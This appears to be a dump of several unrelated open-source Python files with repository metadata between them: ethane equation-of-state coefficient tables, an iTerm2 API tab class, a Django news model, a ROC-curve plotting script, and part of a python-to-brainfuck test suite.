280 5 13.26 -0.228 160.21 48.73 103.93 603.7 57.96 90.7
>>> st=C2(T=300, P=1e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
300 1 0.43 11.364 209.01 45.59 57.20 296.8 9.65 22.2
>>> st=C2(T=330, P=5e5, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
330 0.5 0.19 13.366 220.86 48.51 57.89 320.8 10.37 25.6
>>> st=C2(T=360, P=2e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
360 2 0.73 14.5 213.23 53.11 65.46 319.6 11.65 31.1
>>> st=C2(T=400, P=5e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
400 5 1.77 16.051 210.58 59.05 76.57 322.4 13.91 40.0
>>> st=C2(T=430, P=2e7, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
430 20 7.42 14.158 197.14 64.79 101.22 409.8 27.52 66.5
>>> st=C2(T=480, P=1e5, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
480 0.1 0.03 23.500 259.25 67.28 75.67 385.8 14.28 50.1
>>> st=C2(T=500, P=6e7, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
500 60 11.21 19.385 199.38 73.24 95.28 752.5 48.34 101.4
""",
"R": 8.31451,
"cp": Fi3,
"ref": {"Tref": 298.15, "Pref": 101.325, "ho": 11874, "so": 229.12},
"Tt": 90.352, "Tc": 305.33, "Pc": 4871.8, "rhoc": 6.87, "M": 30.07,
"Tmin": 90.352, "Tmax": 625.0, "Pmax": 70000.0, "rhomax": 22.419,
"Pmin": 1.130e-3, "rhomin": 21.665,
"nr1": [0.46215430560, -0.19236936387e1, 0.39878604003, 0.16054532372e-1,
0.12895242219, 0.35458320491e-1, 0.34927844540e-1,
-0.11306183380e-1, -0.39809032779e-1, 0.83031936834e-3,
0.45921575183e-3, 0.17530287917e-6, -0.70919516126e-4],
"d1": [1, 1, 1, 2, 2, 2, 3, 3, 3, 6, 7, 7, 8],
"t1": [0, 1.5, 2.5, -0.5, 1.5, 2, 0, 1, 2.5, 0, 2, 5, 2],
"nr2": [-0.23436162249, 0.84574697645e-1, 0.14861052010, -0.10016857867,
-0.59264824388e-1, -0.41263514217e-1, 0.21855161869e-1,
-0.74552720958e-4, -0.98859085572e-2, 0.10208416499e-2,
-0.52189655847e-3, 0.98592162030e-4, 0.46865140856e-1,
-0.19558011646e-1, -0.46557161651e-1, 0.32877905376e-2,
0.13572090185, -0.10846471455, -0.67502836903e-2],
"d2": [1, 1, 2, 2, 3, 3, 5, 6, 7, 8, 10, 2, 3, 3, 4, 4, 5, 5, 5],
"t2": [5, 6, 3.5, 5.5, 3, 7, 6, 8.5, 4, 6.5, 5.5, 22, 11, 18, 11, 23,
17, 18, 23],
"c2": [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 4, 4, 4, 4, 4, 4, 4, 4],
"gamma2": [1]*19}
helmholtz4 = {
"__type__": "Helmholtz",
"__name__": "short Helmholtz equation of state for ethane of Span and Wagner (2003)",
"__doi__": {"autor": "Span, R., Wagner, W.",
"title": "Equations of state for technical applications. II. Results for nonpolar fluids.",
"ref": "Int. J. Thermophys. 24 (2003), 41 – 109.",
"doi": "10.1023/A:1022310214958"},
"__test__": """
>>> st=C2(T=700, rho=200, eq=4)
>>> print "%0.4f %0.3f %0.4f" % (st.cp0.kJkgK, st.P.MPa, st.cp.kJkgK)
3.2991 44.781 3.6276
>>> st2=C2(T=750, rho=100, eq=4)
>>> print "%0.2f %0.5f" % (st2.h.kJkg-st.h.kJkg, st2.s.kJkgK-st.s.kJkgK)
209.07 0.50715
""", # Table III, Pag 46
"R": 8.31451,
"cp": Fi1,
"ref": "OTO",
"Tmin": 90.352, "Tmax": 750.0, "Pmax": 100000.0, "rhomax": 22.419,
"Pmin": 0.0010902, "rhomin": 21.721,
"nr1": [0.97628068, -0.26905251e1, 0.73498222, -0.35366206e-1,
0.84692031e-1, 0.24154594e-3],
"d1": [1, 1, 1, 2, 3, 7],
"t1": [0.25, 1.125, 1.5, 1.375, 0.25, 0.875],
"nr2": [0.23964954, -0.42780093e-1, -0.22308832, -0.51799954e-1,
-0.27178426e-1, 0.11246305e-1],
"d2": [2, 5, 1, 4, 3, 4],
"t2": [0.625, 1.75, 3.625, 3.625, 14.5, 12.],
"c2": [1, 1, 2, 2, 3, 3],
"gamma2": [1]*6}
helmholtz5 = {
"__type__": "Helmholtz",
"__name__": "Helmholtz equation of state for ethane of Sun and Ely (2004)",
"__doi__": {"autor": "Sun, L. and Ely, J.F.",
"title": "Universal equation of state for engineering application: Algorithm and application to non-polar and polar fluids",
"ref": "Fluid Phase Equilib., 222-223:107-118, 2004.",
"doi": "10.1016/j.fluid.2004.06.028"},
"R": 8.314472,
"cp": Fi1,
"ref": "OTO",
"Tmin": Tt, "Tmax": 675.0, "Pmax": 900000.0, "rhomax": 22.419,
"Pmin": 0.00114, "rhomin": 21.668,
"nr1": [1.32031629, 9.47177394e-1, -3.21919278, 7.47287278e-2,
2.74919584e-4, -6.33952115e-2],
"d1": [1, 1, 1, 3, 7, 2],
"t1": [1.5, 0.25, 1.25, 0.25, 0.875, 1.375],
"nr2": [-5.17685674e-2, 3.65838926e-2, 2.57753669e-1, -1.34856586e-2,
-2.21551776e-1, -6.89219870e-4, -4.47904791e-2, -2.15665728e-2],
"d2": [1, 1, 2, 5, 1, 1, 4, 2],
"t2": [0, 2.375, 2., 2.125, 3.5, 6.5, 4.75, 12.5],
"c2": [1, 1, 1, 1, 2, 2, 2, 3],
"gamma2": [1]*8}
eq = helmholtz1, MBWR, GERG, helmholtz3, helmholtz4, helmholtz5
_surface = {"sigma": [0.07602, -0.02912], "exp": [1.32, 1.676]}
_dielectric = {"eq": 3, "Tref": 273.16, "rhoref": 1000.,
"a0": [], "expt0": [], "expd0": [],
"a1": [11.1552, 0.0112], "expt1": [0, 1], "expd1": [1, 1],
"a2": [36.759, 23.639, -808.03, -378.84],
"expt2": [0, 1, 0, 1], "expd2": [2, 2, 2.75, 2.75]}
_melting = {"eq": 1, "Tref": Tt, "Pref": 0.0011421,
"Tmin": Tt, "Tmax": 2000.0,
"a1": [1, 1.05262374e8, -1.05262374e8], "exp1": [0, 2.55, 0],
"a2": [2.23626315e8], "exp2": [1], "a3": [], "exp3": []}
_vapor_Pressure = {
"eq": 5,
"ao": [-6.48647577, 1.47010078, -1.66261122, 3.57898378, -4.79105705],
"exp": [1, 1.5, 2.5, 3.5, 4]}
_liquid_Density = {
"eq": 4,
"ao": [1.56138026, -0.381552776, 0.078537204, 0.0370315089],
"exp": [0.987, 2, 4, 9.5]}
_vapor_Density = {
"eq": 6,
"ao": [-1.89879145, -3.65459262, 0.850562745, 0.363965487, -1.50005943,
-2.26690389],
"exp": [1.038, 2.5, 3, 6, 9, 15]}
visco0 = {"eq": 1, "omega": 1,
"collision": [0.17067154, -0.48879666, 0.039038856],
"__name__": "Friend (1991)",
"__doi__": {"autor": "Friend, D.G., Ingham, H., and Ely, J.F.",
"title": "Thermophysical Properties of Ethane",
"ref": "J. Phys. Chem. Ref. Data 20, 275 (1991)",
"doi": "10.1063/1.555881"},
"ek": 245.0, "sigma": 0.43682,
"Tref": 1, "rhoref": 1.*M,
"n_chapman": 0.1463897/M**0.5,
"Tref_res": 305.33, "rhoref_res": 6.87*M, "etaref_res": 15.977,
"n_num": [0.47177003, -0.23950311, 0.39808301, -0.27343335,
0.35192260, -0.21101308, -0.00478579, 0.07378129,
-0.030425255],
"t_num": [0, -1, 0, -1, -1.5, 0, -2, 0, -1],
"d_num": [1, 1, 2, 2, 2, 3, 3, 4, 4],
"g_num": [0, 0, 0, 0, 0, 0, 0, 0, 0],
"c_num": [0, 0, 0, 0, 0, 0, 0, 0, 0],
"n_den": [1., -0.30435286, 0.001215675],
"t_den": [0, 0, -1],
"d_den": [0, 1, 1],
"g_den": [0, 0, 0],
"c_den": [0, 0, 0]}
visco1 = {"eq": 2, "omega": 2,
"__name__": "Younglove (1987)",
"__doi__": {"autor": "Younglove, B.A. and Ely, J.F.",
"title": "Thermophysical Properties of Fluids. II. Methane, Ethane, Propane, Isobutane, and Normal Butane ",
"ref": "J. Phys. Chem. Ref. Data 16, 577 (1987)",
"doi": "10.1063/1.555785"},
"ek": 240.0, "sigma": 0.440110,
"n_chapman": 0.146388493/M**0.5,
"F": [0.2102436247e1, -0.1065920192e1, 1.4, 305.33],
"E": [-0.1903481042e2, 0.1799260494e4, 0.1561316986e2,
-0.1497221136e5, 0.1130374601, -0.2186440756e2,
0.8235954037e4],
"rhoc": 6.875}
visco2 = {"eq": 4, "omega": 1,
"__name__": u"Quiñones-Cisneros (2006)",
"__doi__": {"autor": "S.E.Quiñones-Cisneros and U.K. Deiters",
"title": "Generalization of the Friction Theory for Viscosity Modeling",
"ref": "J. Phys. Chem. B, 2006, 110 (25), pp 12820–12834",
"doi": "10.1021/jp0618577"},
"Tref": 305.322, "muref": 1.0,
"ek": 240.0, "sigma": 0.440110, "n_chapman": 0,
"n_ideal": [15.9252, -49.7734, 43.4368],
"t_ideal": [0, 0.25, 0.5],
"a": [-7.50685764546476e-6, -1.50327318940575e-6, 5.58090793793288e-15],
"b": [6.72861662009487e-5, -4.36450942982638e-5, -7.97441663817752e-14],
"c": [3.88039503242230e-5, -1.38523739665972e-5, -2.64094611051755e-15],
"A": [7.68043111364307e-10, -1.32047872761278e-10, 0.0],
"B": [9.15406537766279e-9, 4.13028199950288e-10, 0.0],
"C": [-1.45842039761136e-7, 2.39764228120527e-7, 0.0],
"D": [0.0, 0.0, 0.0]}
_viscosity = visco0, visco1, visco2
thermo0 = {"eq": 1,
"__name__": "Friend (1991)",
"__doi__": {"autor": "Friend, D.G., Ingham, H., and Ely, J.F.",
"title": "Thermophysical Properties of Ethane",
"ref": "J. Phys. Chem. Ref. Data 20, 275 (1991)",
"doi": "10.1063/1.555881"},
"Tref": 245.0, "kref": 1e-3,
"no": [1.7104147, -0.6936482, 0],
"co": [0, -1, -96],
"Trefb": 305.33, "rhorefb": 6.87, "krefb": 4.41786e-3,
"nb": [0.96084322, 2.7500235, -0.026609289, -0.078146729,
0.21881339, 2.3849563, -0.75113971],
"tb": [0, 0, 0, 0, 0, -1.5, -1],
"db": [1, 2, 3, 4, 5, 1, 3],
"cb": [0]*7,
"critical": 3,
"gnu": 0.63, "gamma": 1.242, "R0": 1.01,
"Xio": 0.19e-9, "gam0": 0.0563, "qd": -0.545e-9, "Tcref": 610.66}
_thermal = thermo0,
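# Usage sketch (an illustration, not part of the original module): the
# dictionaries above are consumed by the enclosing pyMEoS-style ethane class,
# C2 in the doctest near the top, whose constructor takes a state point plus
# an index into the `eq` tuple (4 and 5 select helmholtz4 and helmholtz5):
#
#     st = C2(T=700, rho=200, eq=4)
#     print st.P.MPa, st.cp.kJkgK      # pressure [MPa], cp [kJ/kg/K]
#     st2 = C2(T=750, rho=100, eq=5)   # Sun and Ely (2004) equation
#     print st2.h.kJkg - st.h.kJkg     # enthalpy difference [kJ/kg]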
|
gpl-3.0
| -2,264,954,759,358,182,100
| 55.345395
| 181
| 0.480326
| false
| 2.13034
| false
| false
| false
|
lgouger/iTerm2
|
api/library/python/iterm2/iterm2/tab.py
|
1
|
10947
|
"""Provides a class that represents an iTerm2 tab."""
import enum
import iterm2.api_pb2
import iterm2.app
import iterm2.capabilities
import iterm2.rpc
import iterm2.session
import iterm2
import json
import typing
class NavigationDirection(enum.Enum):
"""Cardinal directions."""
LEFT = "left"
RIGHT = "right"
ABOVE = "above"
BELOW = "below"
class Tab:
"""Represents a tab.
Don't create this yourself. Instead, use :class:`~iterm2.App`."""
def __init__(self, connection, tab_id, root, tmux_window_id=None, tmux_connection_id=None):
self.connection = connection
self.__tab_id = tab_id
self.__root = root
self.active_session_id = None
self.__tmux_window_id = tmux_window_id
self.__tmux_connection_id = tmux_connection_id
def __repr__(self):
return "<Tab id=%s sessions=%s>" % (self.__tab_id, self.sessions)
def update_from(self, other):
"""Copies state from another tab into this one."""
self.__root = other.root
self.active_session_id = other.active_session_id
def update_session(self, session):
"""Replaces references to a session."""
self.__root.update_session(session)
@property
def window(self) -> 'iterm2.Window':
"""Returns the containing window."""
# Note: App sets get_window on Tab when it's created.
return Tab.get_window(self)
@property
def tmux_connection_id(self):
return self.__tmux_connection_id
@property
def tab_id(self) -> str:
"""
Each tab has a globally unique identifier.
:returns: The tab's identifier, a string.
"""
return self.__tab_id
@property
def sessions(self) -> typing.List[iterm2.session.Session]:
"""
A tab contains a list of sessions, which are its split panes.
:returns: The sessions belonging to this tab, in no particular order.
"""
return self.__root.sessions
@property
def root(self) -> iterm2.session.Splitter:
"""
A tab's sessions are stored in a tree. This returns the root of that tree.
An interior node of the tree is a Splitter. That corresponds to a
collection of adjacent sessions with split pane dividers that are all
either vertical or horizontal.
Leaf nodes are Sessions.
:returns: The root of the session tree.
"""
return self.__root
@property
def current_session(self) -> typing.Union[None, iterm2.session.Session]:
"""
:returns: The active session in this tab or `None` if it could not be determined.
"""
for session in self.sessions:
if session.session_id == self.active_session_id:
return session
return None
def pretty_str(self, indent: str="") -> str:
"""
:returns: A human readable description of the tab and its sessions.
"""
session = indent + "Tab id=%s\n" % self.tab_id
session += self.__root.pretty_str(indent=indent + " ")
return session
async def async_select(self, order_window_front: bool=True) -> None:
"""Deprecated in favor of `async_activate`."""
        await self.async_activate(order_window_front)
async def async_activate(self, order_window_front: bool=True) -> None:
"""
Selects this tab.
        :param order_window_front: Whether the window this tab is in should be brought to the front and given keyboard focus.
.. seealso:: Example ":ref:`function_key_tabs_example`"
"""
await iterm2.rpc.async_activate(
self.connection,
False,
True,
order_window_front,
tab_id=self.__tab_id)
async def async_select_pane_in_direction(self, direction: NavigationDirection) -> typing.Optional[str]:
"""
Activates a split pane adjacent to the currently selected pane.
Requires iTerm2 version 3.3.2.
        :param direction: Specifies the direction to move. For example, LEFT selects the pane to the left of the currently active one.
        :returns: The ID of the newly selected session, or None if there was no session in that direction.
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
if not iterm2.capabilities.supports_select_pane_in_direction(self.connection):
raise iterm2.capabilities.AppVersionTooOld()
invocation = iterm2.util.invocation_string(
"iterm2.select_pane_in_direction",
{ "direction": direction.value })
await iterm2.rpc.async_invoke_method(self.connection, self.tab_id, invocation, -1)
async def async_update_layout(self) -> None:
"""Adjusts the layout of the sessions in this tab.
Change the `Session.preferred_size` of any sessions you wish to adjust before calling this.
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
response = await iterm2.rpc.async_set_tab_layout(self.connection, self.tab_id, self.__root.to_protobuf())
status = response.set_tab_layout_response.status
if status == iterm2.api_pb2.SetTabLayoutResponse.Status.Value("OK"):
return response.set_tab_layout_response
else:
raise iterm2.rpc.RPCException(iterm2.api_pb2.SetTabLayoutResponse.Status.Name(status))
@property
def tmux_window_id(self) -> typing.Union[None, str]:
"""Returns this tab's tmux window id or None.
:returns: A tmux window id or `None` if this is not a tmux integration window.
"""
return self.__tmux_window_id
async def async_set_variable(self, name: str, value: typing.Any) -> None:
"""
Sets a user-defined variable in the tab.
See the Scripting Fundamentals documentation for more information on user-defined variables.
:param name: The variable's name. Must begin with `user.`.
:param value: The new value to assign.
:throws: :class:`RPCException` if something goes wrong.
"""
result = await iterm2.rpc.async_variable(
self.connection,
sets=[(name, json.dumps(value))],
tab_id=self.__tab_id)
status = result.variable_response.status
if status != iterm2.api_pb2.VariableResponse.Status.Value("OK"):
raise iterm2.rpc.RPCException(iterm2.api_pb2.VariableResponse.Status.Name(status))
async def async_get_variable(self, name: str) -> typing.Any:
"""
Fetches a tab variable.
See Badges documentation for more information on variables.
:param name: The variable's name.
:returns: The variable's value or `None` if it is undefined.
:throws: :class:`RPCException` if something goes wrong.
.. seealso:: Example ":ref:`sorttabs_example`"
"""
result = await iterm2.rpc.async_variable(self.connection, gets=[name], tab_id=self.__tab_id)
status = result.variable_response.status
if status != iterm2.api_pb2.VariableResponse.Status.Value("OK"):
raise iterm2.rpc.RPCException(iterm2.api_pb2.VariableResponse.Status.Name(status))
else:
return json.loads(result.variable_response.values[0])
async def async_close(self, force: bool=False) -> None:
"""
Closes the tab.
:param force: If True, the user will not be prompted for a confirmation.
:throws: :class:`RPCException` if something goes wrong.
.. seealso:: Example ":ref:`close_to_the_right_example`"
"""
result = await iterm2.rpc.async_close(self.connection, tabs=[self.__tab_id], force=force)
status = result.close_response.statuses[0]
if status != iterm2.api_pb2.CloseResponse.Status.Value("OK"):
raise iterm2.rpc.RPCException(iterm2.api_pb2.CloseResponse.Status.Name(status))
async def async_set_title(self, title: str):
"""Changes the tab's title.
This is equivalent to editing the tab's title with the menu item Edit Tab Title. The title is an interpolated string.
:param title: The new title. Set it to an empty string to use the default value (the current session's title).
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
invocation = iterm2.util.invocation_string(
"iterm2.set_title",
{ "title": title })
await iterm2.rpc.async_invoke_method(self.connection, self.tab_id, invocation, -1)
async def async_invoke_function(self, invocation: str, timeout: float=-1):
"""
        Invoke an RPC. This may be a function registered by this or another script, or a built-in function.
This invokes the RPC in the context of this tab. Note that most user-defined RPCs expect to be invoked in the context of a session. Default variables will be pulled from that scope. If you call a function from the wrong context it may fail because its defaults will not be set properly.
:param invocation: A function invocation string.
        :param timeout: Max number of seconds to wait. Negative values mean to use the system default timeout.
:returns: The result of the invocation if successful.
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
response = await iterm2.rpc.async_invoke_function(
self.connection,
invocation,
tab_id=self.tab_id,
timeout=timeout)
which = response.invoke_function_response.WhichOneof('disposition')
if which == 'error':
if response.invoke_function_response.error.status == iterm2.api_pb2.InvokeFunctionResponse.Status.Value("TIMEOUT"):
raise iterm2.rpc.RPCException("Timeout")
else:
raise iterm2.rpc.RPCException("{}: {}".format(
iterm2.api_pb2.InvokeFunctionResponse.Status.Name(
response.invoke_function_response.error.status),
response.invoke_function_response.error.error_reason))
return json.loads(response.invoke_function_response.success.json_result)
async def async_move_to_window(self) -> 'iterm2.window.Window':
"""
Moves this tab to its own window, provided there are multiple tabs in the window it belongs to.
        :returns: The new window.
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
window_id = await self.async_invoke_function("iterm2.move_tab_to_window()")
app = await iterm2.app.async_get_app(self.connection)
assert(app)
window = app.get_window_by_id(window_id)
if not window:
raise iterm2.rpc.RPCException("No such window {}".format(window_id))
return window
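# Usage sketch (an addition for illustration, not part of the original file).
# It assumes a running iTerm2 with the Python API enabled; async_get_app and
# run_until_complete live in this same iterm2 package. current_terminal_window
# can be None when no window has focus, which this sketch does not handle.
if __name__ == '__main__':
    async def _demo(connection):
        app = await iterm2.app.async_get_app(connection)
        tab = app.current_terminal_window.current_tab
        await tab.async_set_title("scratch")  # interpolated-string tab title
        print(tab.pretty_str())               # dump the tab's session tree
    iterm2.run_until_complete(_demo)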
|
gpl-2.0
| -8,314,729,409,645,964,000
| 38.377698
| 294
| 0.636065
| false
| 4.006955
| false
| false
| false
|
OpenTTD-Ladder/ladder-web
|
ladder/frontpage/models.py
|
1
|
1035
|
from django.conf import settings
from django.db import models
from django.utils import timezone
from translations.models import Translatable, Translation
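# Use django-ckeditor's rich-text field when it is installed; otherwise fall
# back to a plain TextField so the models still import without it.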
try:
from ckeditor.fields import RichTextField
except ImportError:
RichTextField = models.TextField
class News(Translatable):
author = models.ForeignKey(settings.AUTH_USER_MODEL, related_name = "news_authored")
authored = models.DateTimeField(default = timezone.now)
background = models.ImageField(upload_to = "images", blank = True, null = True)
class Meta:
verbose_name = "News Item"
verbose_name_plural = "News Items"
class NewsTranslation(Translation):
news = models.ForeignKey(News, related_name='translations')
title = models.CharField(max_length = 64)
intro = RichTextField()
continued = RichTextField()
def __unicode__(self):
return self.title
class Meta:
verbose_name = "Translation"
verbose_name_plural = "Translations"
|
gpl-2.0
| -3,211,320,791,145,666,600
| 32.419355
| 97
| 0.674396
| false
| 4.348739
| false
| false
| false
|
ntamas/yard
|
yard/scripts/plot.py
|
1
|
9037
|
"""Standalone command-line application that plots ROC, precision-recall
and accumulation curves."""
import sys
from itertools import cycle
from yard.data import BinaryClassifierData
from yard.curve import CurveFactory
from yard.scripts import CommandLineAppForClassifierData
from yard.utils import parse_size
__author__ = "Tamas Nepusz"
__email__ = "tamas@cs.rhul.ac.uk"
__copyright__ = "Copyright (c) 2010, Tamas Nepusz"
__license__ = "MIT"
class ROCPlotterApplication(CommandLineAppForClassifierData):
"""\
%prog input_file
Standalone command-line application that plots ROC, precision-recall
and accumulation curves.
The input file must contain one observation per line, the first column
being the expected class (1 for positive examples, -1 for negatives),
the second being the prediction itself. You can also use the -c switch
to use different column indices and multiple datasets. Columns are
    separated by whitespace by default.\
"""
short_name = "yard-plot"
def __init__(self):
super(ROCPlotterApplication, self).__init__()
def add_parser_options(self):
"""Creates the command line parser object for the application"""
super(ROCPlotterApplication, self).add_parser_options()
parser = self.parser
parser.add_option(
"-t",
"--curve-type",
dest="curve_types",
metavar="TYPE",
choices=CurveFactory.get_curve_names(),
action="append",
default=[],
help="sets the TYPE of the curve to be plotted "
"(roc, pr, ac, sespe or croc). May be specified "
"multiple times.",
)
parser.add_option(
"-l",
"--log-scale",
dest="log_scale",
metavar="AXES",
help="use logarithmic scale on the given AXES. "
"Valid values: none, x, y and xy",
choices=["none", "x", "y", "xy"],
default="none",
)
parser.add_option(
"-o",
"--output",
dest="output",
metavar="FILE",
help="saves the plot to the given FILE instead of showing it",
default=None,
)
parser.add_option(
"-s",
"--size",
dest="size",
metavar="WIDTHxHEIGHT",
help="sets the size of the figure to WIDTHxHEIGHT, where "
"WIDTH and HEIGHT are measures in inches. You may "
"specify alternative measures (cm or mm) by adding "
'them as a suffix; e.g., "6cmx4cm" or "6cm x 4cm"',
default=None,
)
parser.add_option(
"--dpi",
dest="dpi",
metavar="DPI",
type=float,
default=72.0,
help="specifies the dpi value (dots per inch) when "
"converting pixels to inches and vice versa "
"in figure and font size calculations. "
"Default: %default",
)
parser.add_option(
"--font-size",
dest="font_size",
metavar="SIZE",
type=float,
default=None,
help="overrides the font size to be used on figures, " "in points (pt).",
)
parser.add_option(
"--show-auc",
dest="show_auc",
action="store_true",
default=False,
help="shows the AUC scores in the legend",
)
parser.add_option(
"--no-resampling",
dest="resampling",
action="store_false",
default=True,
help="don't resample curves before " "plotting and AUC calculation",
)
def run_real(self):
"""Runs the main application"""
import matplotlib
# Do we need headless mode for matplotlib?
if self.options.output:
matplotlib.use("agg")
# If no curve type was given, assume a ROC curve
if not self.options.curve_types:
self.options.curve_types = ["roc"]
# Set up the font size
if self.options.font_size is not None:
for param in ["font.size", "legend.fontsize"]:
matplotlib.rcParams[param] = self.options.font_size
# Get the types of the curves to be plotted
curve_classes = []
for name in self.options.curve_types:
try:
curve_classes.append(CurveFactory.find_class_by_name(name))
except ValueError:
self.parser.error("Unknown curve type: %s" % name)
# Do we have multiple curve types? If so, we need PDF output
pp = None
if len(curve_classes) > 1:
if not self.options.output or not self.options.output.endswith(".pdf"):
self.parser.error("multiple curves can only be plotted to PDF")
try:
from matplotlib.backends.backend_pdf import PdfPages
except ImportError:
self.parser.error(
"Matplotlib is too old and does not have "
"multi-page PDF support yet. Please upgrade it to "
"Matplotlib 0.99 or later"
)
pp = PdfPages(self.options.output)
def figure_saver(figure):
pp.savefig(figure, bbox_inches="tight")
elif self.options.output:
# Figure with a single plot will be created
def figure_saver(figure):
self.log.info("Saving plot to %s..." % self.options.output)
figure.savefig(self.options.output, bbox_inches="tight")
else:
# Figure will be shown on screen
def figure_saver(figure):
import matplotlib.pyplot as plt
plt.show()
self.process_input_files()
self.log.info("Plotting results...")
for curve_class in curve_classes:
fig = self.get_figure_for_curves(curve_class)
figure_saver(fig)
# For multi-page output, we have to close it explicitly
if pp is not None:
pp.close()
def get_figure_for_curves(self, curve_class):
"""Plots curves given by `curve_class` for all the data in `self.data`.
`curve_class` is a subclass of `BinaryClassifierPerformanceCurve`.
`self.data` must be a dict of lists, and the ``__class__`` key of
`self.data` must map to the expected classes of elements. Returns an
instance of `matplotlib.figure.Figure`."""
fig, axes = None, None
data = self.data
expected = data["__class__"]
keys = sorted(data.keys())
keys.remove("__class__")
styles = [
"r-",
"b-",
"g-",
"c-",
"m-",
"y-",
"k-",
"r--",
"b--",
"g--",
"c--",
"m--",
"y--",
"k--",
]
# Plot the curves
line_handles, labels, aucs = [], [], []
for key, style in zip(keys, cycle(styles)):
self.log.info(
"Calculating %s for %s..." % (curve_class.get_friendly_name(), key)
)
observed = data[key]
bc_data = BinaryClassifierData(zip(observed, expected), title=key)
curve = curve_class(bc_data)
if self.options.resampling:
curve.resample(x / 2000.0 for x in range(2001))
if self.options.show_auc:
aucs.append(curve.auc())
labels.append("%s, AUC=%.4f" % (key, aucs[-1]))
else:
labels.append(key)
if not fig:
dpi = self.options.dpi
fig = curve.get_empty_figure(
dpi=dpi, figsize=parse_size(self.options.size, dpi=dpi)
)
axes = fig.get_axes()[0]
line_handle = curve.plot_on_axes(axes, style=style, legend=False)
line_handles.append(line_handle)
if aucs:
# Sort the labels of the legend in decreasing order of AUC
indices = sorted(range(len(aucs)), key=aucs.__getitem__, reverse=True)
line_handles = [line_handles[i] for i in indices]
labels = [labels[i] for i in indices]
aucs = [aucs[i] for i in indices]
if axes:
legend_pos = "best"
# Set logarithmic axes if needed
if "x" in self.options.log_scale:
axes.set_xscale("log")
legend_pos = "upper left"
if "y" in self.options.log_scale:
axes.set_yscale("log")
# Plot the legend
axes.legend(line_handles, labels, loc=legend_pos)
return fig
def main():
"""Entry point for the plotter script"""
sys.exit(ROCPlotterApplication().run())
if __name__ == "__main__":
main()
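# Usage sketch (file name and data are illustrative, not from the original):
#
#   $ cat predictions.txt
#   1   0.87
#   -1  0.12
#   1   0.55
#   $ yard-plot -t roc -t pr --show-auc -o curves.pdf predictions.txt
#
# The first column is the expected class, the second the prediction, as the
# class docstring above describes; multiple -t values require PDF output, per
# the check in run_real.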
|
mit
| -2,838,634,514,883,085,300
| 31.507194
| 85
| 0.531592
| false
| 4.168358
| false
| false
| false
|
vegitron/python2brainfuck
|
t/py2b/if_statements.py
|
1
|
4029
|
import unittest
from p2bf.builder import BFBuild
from p2bf.emitter import Emitter
import StringIO
from util.run_bf import run
class TestIfStatements(unittest.TestCase):
def test_if_true(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """if True:\n print "OK" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "OK\n")
def test_if_false(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """if False:\n print "BAD" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "")
def test_other_var_true(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """foo = 'A'\nif foo:\n print "OK" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "OK\n")
def test_plain_string_true(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """if 'A':\n print "OK" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "OK\n")
def test_if_else_match_if(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if 'A':\n print 'IF'\n"
"else:\n print 'ELSE'\n")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "IF\n")
def test_if_else_match_else(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
